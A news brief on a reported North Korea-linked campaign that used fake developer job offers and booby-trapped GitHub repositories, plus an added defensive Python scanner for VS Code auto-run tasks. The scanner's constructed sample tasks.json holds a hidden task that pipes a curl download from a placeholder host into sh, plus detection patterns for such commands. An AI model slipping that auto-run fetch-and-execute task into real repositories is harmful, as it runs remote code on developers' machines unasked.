Security researchers have uncovered a new phishing campaign attributed to North Korean operators that sent more than 250 fraudulent job offer emails to developers over six weeks in April and May. The operation used fake recruitment pitches and code review requests to deploy malware across multiple operating systems and steal crypto assets alongside credentials.
- 250+ fake developer job offers sent over six weeks
- Attacks bypass platforms like LinkedIn, using email and GitHub
- Malware installs persistent VS Code extension to steal crypto and credentials
What happened
A previously unseen phishing campaign, believed to be backed by North Korean threat actors, sent over 250 fraudulent job offer emails to developers at nearly 100 organizations, mostly based in the United States, over April and May 2026. The emails were crafted to appear as legitimate job offers for developer roles and were used as a lure to distribute malicious software.
Targets were asked to clone GitHub repositories containing malicious code disguised as coding assignments or cryptocurrency-related projects. Once the repositories were opened in code editors such as Visual Studio Code or Cursor, pre-configured tasks silently executed malware loaders tailored for Linux, macOS, and Windows, though the persistence mechanisms worked only on macOS and Linux.
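The auto-run behaviour described above can be checked for before a cloned repository is ever opened in an editor. The scanner below is an added example written for this brief, not code from the researchers or from any project the article names. It assumes that the "pre-configured tasks" are VS Code tasks.json entries with runOptions.runOn set to "folderOpen" (a documented VS Code feature that Cursor inherits), and it builds a constructed sample repository in a temporary directory, including a placeholder extension identifier, so that it runs offline.

```python
"""
Scan a cloned repository's .vscode folder for settings that make the editor run
commands simply because the folder was opened. Added example for this brief; the
sample repository, its task definitions and the extension identifier below are
constructed for the demonstration and do not come from the reported campaign.
"""
import json
import re
import tempfile
from pathlib import Path

# Fragments that suggest a task fetches and runs something rather than building code.
SUSPICIOUS_PATTERNS = [
    r"\bcurl\b", r"\bwget\b", r"\|\s*(ba)?sh\b", r"\bbase64\b",
    r"Invoke-WebRequest", r"ExecutionPolicy\s+Bypass", r"\bchmod\s+\+x", r"/tmp/",
    r"\bnohup\b", r"\blaunchctl\b", r"\bsystemctl\b",
]

# Constructed sample: VS Code tolerates comments and trailing commas in tasks.json,
# so the scanner has to cope with them too.
SAMPLE_TASKS_JSON = r'''{
    // constructed sample tasks.json for the scanner demo
    "version": "2.0.0",
    "tasks": [
        { "label": "build", "type": "shell", "command": "npm run build", },
        {
            "label": "Fetch assignment assets",
            "type": "shell",
            "command": "curl -s https://placeholder.invalid/setup.sh | sh",
            "windows": { "command": "powershell -ExecutionPolicy Bypass -File .\\setup.ps1" },
            "runOptions": { "runOn": "folderOpen" },
            "presentation": { "reveal": "never" },
        },
    ]
}'''
# "example-publisher.cloud-sync-helper" is a placeholder id, not a real extension.
SAMPLE_EXTENSIONS_JSON = '{"recommendations": ["ms-python.python", "example-publisher.cloud-sync-helper"]}'


def strip_jsonc(text: str) -> str:
    """Remove /* */ blocks, whole-line // comments and trailing commas (JSONC -> JSON)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return re.sub(r",\s*([}\]])", r"\1", text)


def load_jsonc(path: Path) -> dict:
    return json.loads(strip_jsonc(path.read_text(encoding="utf-8")))


def task_commands(task: dict) -> dict:
    """Collect the default command plus any per-platform override, args appended."""
    out = {}
    for scope in ("default", "windows", "linux", "osx"):
        section = task if scope == "default" else (task.get(scope) or {})
        cmd = section.get("command")
        if cmd:
            out[scope] = " ".join([str(cmd)] + [str(a) for a in section.get("args", [])])
    return out


def scan_tasks(vscode_dir: Path) -> list:
    """Report every task that runs automatically when the folder is opened."""
    findings = []
    tasks_file = vscode_dir / "tasks.json"
    if not tasks_file.exists():
        return findings
    for task in load_jsonc(tasks_file).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        commands = task_commands(task)
        joined = " ".join(commands.values())
        hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, joined)]
        findings.append({"kind": "auto-run task", "label": task.get("label", "<unnamed>"),
                         "commands": commands, "suspicious": hits})
    return findings


def scan_extension_recommendations(vscode_dir: Path, trusted_publishers) -> list:
    """Flag recommended extensions whose publisher prefix is not on the allowlist."""
    findings = []
    ext_file = vscode_dir / "extensions.json"
    if not ext_file.exists():
        return findings
    for ext_id in load_jsonc(ext_file).get("recommendations", []):
        publisher = ext_id.split(".", 1)[0].lower()
        if publisher not in trusted_publishers:
            findings.append({"kind": "untrusted extension recommendation", "id": ext_id})
    return findings


def scan_repo(repo: Path, trusted_publishers=("ms-python", "ms-vscode", "redhat")) -> list:
    vscode_dir = repo / ".vscode"
    if not vscode_dir.is_dir():
        return []
    return scan_tasks(vscode_dir) + scan_extension_recommendations(vscode_dir, trusted_publishers)


def build_sample_repo(with_vscode: bool = True) -> Path:
    """Write the constructed sample repository to a temp dir and return its path."""
    repo = Path(tempfile.mkdtemp(prefix="sample-repo-"))
    if with_vscode:
        vscode = repo / ".vscode"
        vscode.mkdir()
        (vscode / "tasks.json").write_text(SAMPLE_TASKS_JSON, encoding="utf-8")
        (vscode / "extensions.json").write_text(SAMPLE_EXTENSIONS_JSON, encoding="utf-8")
    return repo


if __name__ == "__main__":
    for finding in scan_repo(build_sample_repo()):
        print(finding)
```

Opening an unfamiliar folder in VS Code's Restricted Mode (Workspace Trust) disables task execution altogether, so a check like this is the second line for the case where a developer has already granted trust; an extension recommendation installs nothing by itself, but it is a cheap social-engineering nudge worth reviewing alongside the task list.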
Why it matters
This campaign highlights continued efforts by DPRK-linked threat groups to exploit professional networks in the technology and financial sectors by blending social engineering with developer workflows. Unlike earlier efforts relying on platforms such as LinkedIn, this campaign made extensive use of direct email and GitHub repositories, increasing attack scale and complexity.
The incorporation of a malicious VS Code extension that mimics Google services demonstrates an evolution in persistence techniques to maintain access across multiple operating systems, ultimately enabling theft of cryptocurrency wallets and developer credentials. The scale and industrialization suggest a significant resource investment and highlight risks to global tech ecosystems.
What to watch next
Organizations, especially those in technology and finance, should closely monitor for suspicious unsolicited job offers and requests to interact with unknown GitHub repositories. Security teams must strengthen email filtering, developer environment protections, and controls around code editor extensions to detect and block malicious payloads effectively.
Threat researchers will likely continue to observe this cluster’s evolution, including shifts in social engineering tactics and delivery infrastructure. Increased awareness and collaboration across the industry will be crucial to mitigating credential theft and cryptocurrency loss from these sophisticated threat operations.